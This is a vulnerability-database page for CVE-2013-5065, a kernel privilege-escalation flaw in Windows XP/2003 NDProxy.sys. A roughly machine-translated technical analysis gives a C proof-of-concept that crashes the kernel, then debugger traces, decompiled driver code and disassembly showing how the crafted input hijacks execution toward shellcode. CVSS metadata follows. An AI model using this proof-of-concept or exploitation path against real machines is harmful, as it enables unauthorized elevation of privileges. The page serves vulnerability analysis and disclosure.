Attacker Value
Unknown
CVE-2013-5065 Microsoft NDProxy.sys Privilege Escalation
CVE-2013-5065 Microsoft NDProxy.sys Privilege Escalation
(Last updated July 25, 2024) ▾
MITRE ATT&CK
Log in to add MITRE ATT&CK tag
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Metasploit Module
Description
NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013.
Add Assessment
1
Technical Analysis
Xp recently broke a local kernel vulnerability extract is said to
capture the eyes of fire in Adobe 0day attack another 0day.
PoC
# Include " windows.h " # include " stdio.h " void main () { HANDLE hDev = CreateFile ( " . \ \ \ \ \ \ NDProxy " , GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0 , NULL); if (hDev == INVALID_HANDLE_VALUE) { printf ( " CreateFile Error:% d \ N " , GetLastError ()); } DWORD inbuf [ 0x15 ] = { 0 }; DWORD dwRetBytes = 0 ; * (inbuf + 5 ) = 0x7030125 ; * (inbuf + 7 ) = 0x34 ; DeviceIoControl (hDev, 0x8fff23cc , inbuf, 0x54 , inbuf, 0x24 , & dwRetBytes, 0 ); CloseHandle (hDev); }
Details
Directly compiled to run on xp sp3 will cause a blue screen, attach the debugger, see the following
exceptions:
Access violation - code c0000005 (second chance!!!!!!) 00000038 ????? kd> r eax = 000001B0 ecx = 00000000 ebx = 81e16d80 edx = 00000000 ESI = 81f31a30 edi = f88f273c eip = 00000038 esp = b203ec18 ebp = b203ec34 iopl up EI pl = 0 NV NZ Na PO NC cs = 0008 SS = 0010 DS = 0023 es = 0023 fs = 0030 GS = 0000 efl = 00010202 00000038?? kd> kb ChildEBP RetAddr Args to Child WARNING: Frame IP Not in . any known Module Following frames May be wrong. b203ec14 f88ed145 81f31a30 81a76c10 81f2b2c0 0x38 b203ec34 8 04ef129 81f46ed8 000001B0 8 06d32d0 NDProxy! PxIODispatch +0 x2b3 b203ec44 8 0575dde 81e16df0 81a76c10 81e16d80 nt! IopfCallDriver +0 X31 b203ec58 8 0576c7f 81f46ed8 81e16d80 81a76c10 nt! IopSynchronousServiceTail +0 X70 b203ed00 8 056f4ec 000007e8 00000000 00000000 nt! IopXxxControlFile +0 x5e7 b203ed34 8 053e648 000007e8 00000000 00000000 nt! NtDeviceIoControlFile +0 x2a b203ed34 7c92e4f4 000007e8 00000000 00000000 nt! KiFastCallEntry +0 xf8 0012fe4c 7c92d26c 7c801675 000007e8 00000000 ntdll! KiFastSystemCallRet 0012fe50 7c801675 000007e8 00000000 00000000 ntdll! ZwDeviceIoControlFile +0 XC 0012feb0 004010c2 000007e8 8fff23cc 0012ff28 0x7c801675 0012ff80 004012e9 00000001 00380fc0 00381058 0x4010c2 0012ffc0 7c817067 00241fe4 0012f7bc 7ffde000 0x4012e9 0012fff0 00000000 00,401,200 00000000 78746341 0x7c817067
By using IDA io_code locate handler gPxIODispatch:
if (v7 == 0x8FFF23C8 | | v7 == 0x8FFF23CC ) { V17 = LockState ; if (LockState <0x24 | | V6 <0x24) { v8 = - 1,073,741,820 ; GOTO LABEL_70 ; } v18 = * (_DWORD *) (v5 + 20 ) - 117637377 ; v36 = 36 ; if ((unsigned int ) v18 <= 0x24)
Restart, and then off to the next handler:
kd> bp NDProxy! PxIODispatch kd> BL 0 e f888ce92 0001 (0001) NDProxy! PxIODispatch kd> g
Run poc, program interrupt handler entrance,
Referring ida
v36 = 0 ; v2 = LockState ; v3 = * (_DWORD *) (LockState + 0x60) ; v4 = * (_BYTE *) v3 == 14 ; v5 = * (_DWORD *) (LockState + 0xC) ;/ / LockState + 0xC exactly InBuf pointer LockState = * (_DWORD *) (v3 + 8 ) ; V6 = * (_DWORD *) (v3 + 4 ) ; v35 = * (_DWORD *) (v3 + 4 ) ; kd> dd esp b20b5c38 804ef129 8212b488 81b28ce8 806d32d0 b20b5c48 80575dde 81b28d58 81ace8a8 81b28ce8 b20b5c58 b20b5d00 80576c7f 8212b488 81b28ce8 b20b5c68 81ace8a8 0012ff00 b20b5d01 b20b5d01 b20b5c78 00000002 b20b5d64 0012fe80 8056f4c2 b20b5c88 80545edc 0012019f 00000000 00000003 00000012 c0100080 b20b5c98 8218aa28 00000e3c b20b5ca8 00000000 00000e40 00000000 81ace8ec kd> dd 81b28ce8 +0 XC 81b28cf4 8212d490 8218ac38 8218ac38 00000000 00000000 01010001 0c000000 81b28d04 0012fe8c 81b28d14 00000000 00000000 00000000 00000000 00000000 00000000 00000000 81b28d24 0012ff28 81b28d34 8218aa28 00000000 00000000 00000000 00000000 81b28d58 81ace8a8 81b28d44 00000000 81b28d54 00000000 0005000e 00000024 00000054 00000000 8212b488 81ace8a8 81b28d64 8fff23cc kd> dd 8212d490 8212d490 00000000 00000000 00000000 00000000 00000000 07030125 00000000 00000034 8212d4a0 8212d4b0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 8212d4c0 8212d4d0 00000000 00000000 00000000 00000000 8212d4e0 00000000 00000000 0001000c 81ecdbf0 8212d4f0 0a060001 ee657645 00000001 00000001 00000000 81e55408 00000000 821b6980 8212d500
Look directly handle iocode places:
if (M_iocode == 0x8FFF23C8 | | M_iocode == 0x8FFF23CC ) { V17 = LockState; if (LockState < 0x24 | | V6 < 0x24 ) { v8 = 0xC0000004u ; GOTO LABEL_70; } v18 = * (_DWORD *) (v5 + 0x14 ) - 0x7030101 ;/ / v5 +0 x14 == 0x7030125 v36 = 36 ; if ((unsigned int ) v18 <= 0x24 ) == 0x24 v18 { v19 = * (_DWORD *) (v5 + 0x1c ); / / v19 = 0x34 v20 = 3 * v18; v21 = v19 < dword_F8892004 [v20] ;/ / dword_F8892004 [v20] is exactly equal to 0x34 LockState = v20 * 4 ;/ / v5 is assigned here if (v21 | | v19> V17 - 32 ) / / skip this if { * (_DWORD *) (V5 + 16 ) = 0xC0012019u ; } else / / enter here { V22 = KfAcquireSpinLock (& SpinLock); byte_F8892740 = V22; if (TspCB) { LOBYTE (v23) = V22; KfReleaseSpinLock ( & SpinLock, v23); * (_DWORD *) (v5 + 16 ) = 4097 ; } else { + + dword_F8892734; if ((unsigned int ) dword_F8892734> 0xFFFFFFFE ) dword_F8892734 = - 2147483647 ; * (_DWORD *) (v5 + 12 ) = dword_F8892734; * (_DWORD *) (v5 + 8 ) = v2; LOBYTE (v23) = byte_F8892740; KfReleaseSpinLock ( & SpinLock, v23); * (_BYTE *) (* (_DWORD *) (v2 + 96 ) + 3 ) | = 1u ; V24 = (* ( int (__ stdcall **) ( int )) (( char *) & off_F8892008 + LockState)) (v5) ;/ / here exception of if (V24 == 259 ) return 259 ; v36 = v35; if (v35> = * (_DWORD *) (v5 + 28 ) + 36 ) v36 = * (_DWORD *) (v5 + 28 ) + 36 ; * (_DWORD *) (v5 + 16 ) = V24; _InterlockedExchange ((Signed __ Int32 *) (v2 + 56 ), 0 ); } } }
assembler code is as follows:
text: F885D0AD loc_F885D0AD:; CODE XREF: PxIODispatch (x, x) +20 D J . text: F885D0AD mov ecx, [ESI +1 Ch] / / ESI +1 c controllable text: F885D0B0 lea eax, [eax + eax * 2. ] / / eax controllable text:. F885D0B3 shl eax, 2 text:. F885D0B6 cmp ecx, dword_F8862004 [eax] text:. F885D0BC mov dword ptr [ebp + LockState.LockState], eax / / pollution LockState.LockState text.: F885D0BF JNB short loc_F885D0CD . text: F885D0C1 text: F885D0C1 loc_F885D0C1:;. CODE XREF: PxIODispatch (x, x) +240 J text: F885D0C1 mov dword ptr [ESI +10 h], 0C0012019h. text: F885D0C8 jmp loc_F885D172. ... . Text: mov eax F885D134, [ebx +60 h] text:. F885D137 or byte ptr [eax +3], 1 text:. F885D13B mov eax, dword ptr [ebp + LockState.LockState] / / pollution eax text:. F885D13E PUSH ESI . text: F885D13F Call off_F8862008 [eax]; Exception! Contaminated eax as an array subscript off_F8862008 passed to the eip. kd> g Breakpoint 2 HIT NDProxy PxIODispatch +0 x2ad:! ! f885d13f ff90082086f8 Call dword ptr NDProxy TapiOids +0 x8 (f8862008) [eax] kd> r eax = 000001B0 ecx = 00000000 ebx = 81e2c2f8 edx = 00000000 ESI = 81cc9368 edi = f886273c eip = f885d13f esp = b1bd9c1c ebp = b1bd9c34 iopl up EI pl = 0 NV NZ Na PO NC cs = 0008 SS = 0010 DS = 0023 es = 0023 fs = 0030 GS = 0000 efl = 00000202 NDProxy PxIODispatch +0 x2ad:! f885d13f ff90082086f8 Call dword ! ptr NDProxy TapiOids +0 x8 (f8862008) [eax] ds: 0023: f88621b8 = 00000038
Here eax = 0x1b0 ie 0x24 * 3 * 4
As for how not to good use, can now expect to be able to control the array eax certain locations
to perform shellcode.
CVSS V3 Severity and Metrics
Data provided by the National Vulnerability Database (NVD)
Base Score:
7.8 High
Impact Score:
5.9
Exploitability Score:
1.8
Attack Vector (AV):
Local
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
Required
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High
General Information
Vendors
- microsoft
Products
- windows 2003 server -,
- windows xp -
Metasploit Modules
